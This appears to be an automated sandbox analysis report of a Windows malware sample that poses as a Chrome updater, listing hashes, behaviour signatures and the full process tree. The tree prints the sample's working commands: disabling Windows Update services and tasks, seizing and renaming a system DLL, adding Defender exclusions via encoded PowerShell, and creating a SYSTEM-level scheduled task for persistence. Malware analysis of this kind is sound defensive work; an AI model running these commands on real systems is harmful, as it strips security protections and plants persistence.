Analysis
-
max time kernel
299s -
max time network
53s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
23-08-2022 10:15
Static task
static1
Behavioral task
behavioral1
Sample
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe
Resource
win7-20220812-en
General
-
Target
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe
-
Size
1.8MB
-
MD5
707de025f2ab727fbb3b33f4ff8b97b3
-
SHA1
51a571a425a36cbbc3103d5e9991d080ccd4abc6
-
SHA256
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea
-
SHA512
256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1848 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1072 takeown.exe 1360 icacls.exe 1884 takeown.exe 1008 icacls.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 984 taskeng.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 1360 icacls.exe 1884 takeown.exe 1008 icacls.exe 1072 takeown.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 2 IoCs
Processes:
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exedescription ioc process File opened for modification C:\Program Files\Google\Chrome\updater.exe 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe File created C:\Program Files\Google\Chrome\updater.exe 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1764 sc.exe 1228 sc.exe 1428 sc.exe 1136 sc.exe 560 sc.exe 932 sc.exe 812 sc.exe 1592 sc.exe 1992 sc.exe 432 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
Processes:
updater.exepowershell.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" updater.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40d1fa47d9b6d801 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ updater.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1164 reg.exe 2040 reg.exe 1356 reg.exe 1352 reg.exe 1008 reg.exe 1964 reg.exe 1944 reg.exe 1728 reg.exe 1664 reg.exe 1248 reg.exe 876 reg.exe 1976 reg.exe 1596 reg.exe 880 reg.exe 1960 reg.exe 1744 reg.exe 1560 reg.exe 1960 reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exe3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exepowershell.exeupdater.exepid process 1984 powershell.exe 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe 1600 powershell.exe 1848 updater.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exe3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exetakeown.exepowershell.exeupdater.exetakeown.exedescription pid process Token: SeDebugPrivilege 1984 powershell.exe Token: SeDebugPrivilege 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe Token: SeTakeOwnershipPrivilege 1884 takeown.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 1848 updater.exe Token: SeTakeOwnershipPrivilege 1072 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.execmd.execmd.execmd.exetaskeng.exeupdater.exedescription pid process target process PID 380 wrote to memory of 1984 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe powershell.exe PID 380 wrote to memory of 1984 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe powershell.exe PID 380 wrote to memory of 1984 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe powershell.exe PID 380 wrote to memory of 1536 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 380 wrote to memory of 1536 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 380 wrote to memory of 1536 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 1536 wrote to memory of 932 1536 cmd.exe sc.exe PID 1536 wrote to memory of 932 1536 cmd.exe sc.exe PID 1536 wrote to memory of 932 1536 cmd.exe sc.exe PID 1536 wrote to memory of 812 1536 cmd.exe sc.exe PID 1536 wrote to memory of 812 1536 cmd.exe sc.exe PID 1536 wrote to memory of 812 1536 cmd.exe sc.exe PID 1536 wrote to memory of 1592 1536 cmd.exe sc.exe PID 1536 wrote to memory of 1592 1536 cmd.exe sc.exe PID 1536 wrote to memory of 1592 1536 cmd.exe sc.exe PID 1536 wrote to memory of 1764 1536 cmd.exe sc.exe PID 1536 wrote to memory of 1764 1536 cmd.exe sc.exe PID 1536 wrote to memory of 1764 1536 cmd.exe sc.exe PID 1536 wrote to memory of 1228 1536 cmd.exe sc.exe PID 1536 wrote to memory of 1228 1536 cmd.exe sc.exe PID 1536 wrote to memory of 1228 1536 cmd.exe sc.exe PID 1536 wrote to memory of 1164 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1164 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1164 1536 cmd.exe reg.exe PID 1536 wrote to memory of 876 1536 cmd.exe reg.exe PID 1536 wrote to memory of 876 1536 cmd.exe reg.exe PID 1536 wrote to memory of 876 1536 cmd.exe reg.exe PID 1536 wrote to memory of 880 1536 cmd.exe reg.exe PID 1536 wrote to memory of 880 1536 cmd.exe reg.exe PID 1536 wrote to memory of 880 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1964 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1964 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1964 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1944 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1944 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1944 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1884 1536 cmd.exe takeown.exe PID 1536 wrote to memory of 1884 1536 cmd.exe takeown.exe PID 1536 wrote to memory of 1884 1536 cmd.exe takeown.exe PID 1536 wrote to memory of 1008 1536 cmd.exe icacls.exe PID 1536 wrote to memory of 1008 1536 cmd.exe icacls.exe PID 1536 wrote to memory of 1008 1536 cmd.exe icacls.exe PID 380 wrote to memory of 2032 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 380 wrote to memory of 2032 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 380 wrote to memory of 2032 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 2032 wrote to memory of 512 2032 cmd.exe schtasks.exe PID 2032 wrote to memory of 512 2032 cmd.exe schtasks.exe PID 2032 wrote to memory of 512 2032 cmd.exe schtasks.exe PID 380 wrote to memory of 1108 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 380 wrote to memory of 1108 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 380 wrote to memory of 1108 380 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 1108 wrote to memory of 560 1108 cmd.exe schtasks.exe PID 1108 wrote to memory of 560 1108 cmd.exe schtasks.exe PID 1108 wrote to memory of 560 1108 cmd.exe schtasks.exe PID 984 wrote to memory of 1848 984 taskeng.exe updater.exe PID 984 wrote to memory of 1848 984 taskeng.exe updater.exe PID 984 wrote to memory of 1848 984 taskeng.exe updater.exe PID 1848 wrote to memory of 1600 1848 updater.exe powershell.exe PID 1848 wrote to memory of 1600 1848 updater.exe powershell.exe PID 1848 wrote to memory of 1600 1848 updater.exe powershell.exe PID 1536 wrote to memory of 1960 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1960 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1960 1536 cmd.exe reg.exe PID 1536 wrote to memory of 2040 1536 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe"C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdABoAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAcgB4ACMAPgA="2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:932 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:812 -
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1592 -
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1764 -
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1228 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
PID:1164 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
PID:876 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
PID:880 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
PID:1964 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
PID:1944 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1884 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1008 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1960 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
PID:2040 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1744 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1728 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵PID:1212
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵PID:1692
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵PID:736
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵PID:656
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵PID:1856
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵PID:1372
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:1828
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""2⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵
- Creates scheduled task(s)
PID:512 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"2⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵PID:560
-
C:\Windows\system32\taskeng.exetaskeng.exe {A95AC557-99AE-4757-B9C9-A798EDB1D3A1} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdABoAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAcgB4ACMAPgA="3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:948
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:1992 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:432 -
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:1428 -
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:1136 -
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:560 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:1560 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:1356 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
PID:1664 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:1352 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:1248 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1072 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1360 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1976 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1596 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1008 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1960 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:1548
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:1636
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:1016
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:1544
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:1476
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:932
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:1700
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "tvtmluklrbli"3⤵PID:1984
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.8MB
MD5707de025f2ab727fbb3b33f4ff8b97b3
SHA151a571a425a36cbbc3103d5e9991d080ccd4abc6
SHA2563ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea
SHA512256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c
-
Filesize
1.8MB
MD5707de025f2ab727fbb3b33f4ff8b97b3
SHA151a571a425a36cbbc3103d5e9991d080ccd4abc6
SHA2563ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea
SHA512256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c
-
Filesize
1.8MB
MD5707de025f2ab727fbb3b33f4ff8b97b3
SHA151a571a425a36cbbc3103d5e9991d080ccd4abc6
SHA2563ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea
SHA512256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c